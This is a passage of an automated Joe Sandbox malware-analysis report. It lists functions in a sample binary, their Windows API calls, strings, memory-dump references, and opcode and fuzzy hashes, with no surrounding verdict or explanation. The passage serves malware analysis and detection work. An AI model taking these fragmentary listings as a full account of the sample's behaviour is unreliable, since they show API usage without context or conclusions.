                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove$_free
                                                                                        • String ID: 3cA$_A
                                                                                        • API String ID: 2620147621-3480954128
                                                                                        • Opcode ID: ef0129cd5816ec15a45b032bd3f3c56bb013280cf55210c9ba5302c07174546d
                                                                                        • Instruction ID: 850dd104c1974142ce8a52b298ec70faaced32133f8a19a743ede36878807482
                                                                                        • Opcode Fuzzy Hash: ef0129cd5816ec15a45b032bd3f3c56bb013280cf55210c9ba5302c07174546d
                                                                                        • Instruction Fuzzy Hash: C7518C716043418FDB24CF29C840BABBBE1FF85304F49482EE98987351DB39E941CB4A
                                                                                        Function 00416192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$_memmove
                                                                                        • String ID: 3cA$ERCP
                                                                                        • API String ID: 2532777613-1471582817
                                                                                        • Opcode ID: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                                                                        • Instruction ID: eaf8e981165fb7e982de03985e75bf568e49202a02b644e32a28802e4b47c64a
                                                                                        • Opcode Fuzzy Hash: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                                                                        • Instruction Fuzzy Hash: 02518C71A00709DBDB24DF65C9817EBB7F4AF04304F2085AFE94A86241E778EA858B59
                                                                                        Function 00462753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 004627C0
                                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
                                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 1173514356-4108050209
                                                                                        • Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                                                        • Instruction ID: 6162d5963bf1ca612739d8e457cf9df7481532cfa70a9704744149088ee17d1e
                                                                                        • Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                                                        • Instruction Fuzzy Hash: F141AE70604701AFD720EF29CD44B1BBBE4AF84314F044A2EF96597391E7B8A905CB6B
                                                                                        Function 0047D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                                                                                          • Part of subcall function 0040784B: _memmove.LIBCMT ref: 00407899
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharLower_memmove
                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                        • API String ID: 3425801089-567219261
                                                                                        • Opcode ID: 48841afb82c51e77e65a662f9d15771e824929b8a1eaa9af7586ff6945600f8e
                                                                                        • Instruction ID: 0be9701992b4b91cd2e68042300235638f00ad80fed84879f118ea648425d64e
                                                                                        • Opcode Fuzzy Hash: 48841afb82c51e77e65a662f9d15771e824929b8a1eaa9af7586ff6945600f8e
                                                                                        • Instruction Fuzzy Hash: 783191719142159BCF00EF55CC919EEB3B4FF14324B108A2BE839A76D2DB39AD05CB95
                                                                                        Function 00458E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$_memmove$ClassName
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 365058703-1403004172
                                                                                        • Opcode ID: 9694635ecc2fb9deb2e2cc82a813c0850caf6602120938544a81ca6f57e54b8a
                                                                                        • Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
                                                                                        • Opcode Fuzzy Hash: 9694635ecc2fb9deb2e2cc82a813c0850caf6602120938544a81ca6f57e54b8a
                                                                                        • Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28
                                                                                        Function 0047182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0047184C
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00471872
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004718A2
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004718E9
                                                                                          • Part of subcall function 00472483: GetLastError.KERNEL32(?,?,00471817,00000000,00000000,00000001), ref: 00472498
                                                                                          • Part of subcall function 00472483: SetEvent.KERNEL32(?,?,00471817,00000000,00000000,00000001), ref: 004724AD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                        • String ID:
                                                                                        • API String ID: 3113390036-3916222277
                                                                                        • Opcode ID: 6e03d3876d11c1f4078e21f2429e25c28f700f0be32576d9d2588f00842c0ae0
                                                                                        • Instruction ID: 9f195ba99928d8c49214c982579914efbee4b11eb605a7749f470a37591c6317
                                                                                        • Opcode Fuzzy Hash: 6e03d3876d11c1f4078e21f2429e25c28f700f0be32576d9d2588f00842c0ae0
                                                                                        • Instruction Fuzzy Hash: 1021B3B15002087FE711AF65DC85EFF77EDEB48748F10812FF44992250DA688D0957AA
                                                                                        Function 004863E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                          • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                          • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00486468
                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
                                                                                        • DestroyWindow.USER32(?), ref: 00486485
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                        • String ID: SysAnimate32
                                                                                        • API String ID: 4146253029-1011021900
                                                                                        • Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                                                        • Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
                                                                                        • Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                                                        • Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768
                                                                                        Function 00466D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00466E01
                                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$FilePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 4209266947-2873401336
                                                                                        • Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                                                        • Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
                                                                                        • Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                                                        • Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A
                                                                                        Function 00466E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00466E89
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
                                                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$FilePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 4209266947-2873401336
                                                                                        • Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                                                        • Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
                                                                                        • Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                                                        • Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A
                                                                                        Function 0046AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0046AC54
                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
                                                                                        • __swprintf.LIBCMT ref: 0046ACC1
                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                        • String ID: %lu
                                                                                        • API String ID: 3164766367-685833217
                                                                                        • Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                                                        • Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
                                                                                        • Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                                                        • Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25
                                                                                        Function 00461142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
                                                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                        • String ID: @F
                                                                                        • API String ID: 2875609808-2781531706
                                                                                        • Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                                                        • Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
                                                                                        • Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                                                        • Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A
                                                                                        Function 0047EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
                                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
                                                                                        • CloseHandle.KERNEL32(?), ref: 0047EDEB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2364364464-0
                                                                                        • Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                                                        • Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
                                                                                        • Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                                                        • Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49
                                                                                        Function 0042541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 1559183368-0
                                                                                        • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                        • Instruction ID: c535a9b74c3be08fb66675131960c2e3f57dfdec9721024cad96d7a05cd33cf3
                                                                                        • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                        • Instruction Fuzzy Hash: 9051BB30B00B15EBCB149E65F84066FB7B2AF40325F94472FF825963D4D7789D918B49
                                                                                        Function 00480037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                          • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 004801AF
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004801BC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
